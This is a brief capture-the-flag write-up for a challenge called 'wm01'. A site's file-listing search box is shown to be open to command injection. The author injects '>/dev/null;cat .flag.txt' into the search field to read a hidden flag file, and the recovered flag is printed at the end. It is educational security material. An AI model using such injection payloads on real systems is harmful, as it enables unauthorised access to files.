wm01 · Addison Crump

Description:

Access the site at https://ggcs-wm01.allyourbases.co and find and then read the contents of the flag file to get the flag.

Upon loading, we are presented with a search box and a blurb: "Take a peek at the linux file system."

This is almost certainly command injection.

Searching for -al effectively confirms this for us, providing us with the results for ls -al in the application directory. Interestingly enough, it has the following results:

total 6
drwxr-xr-x  2 root root   58 May  1 15:39 .
drwxr-xr-x 24 root root 4096 Apr 11 01:54 ..
-rw-r--r--  1 root root   19 Apr  9 08:15 .flag.txt
-rw-r--r--  1 root root  551 May  1 15:39 lambda_function.py

Let's see if we can cat it; searching for >/dev/null;cat .flag.txt...

unSAFE_eXecution_42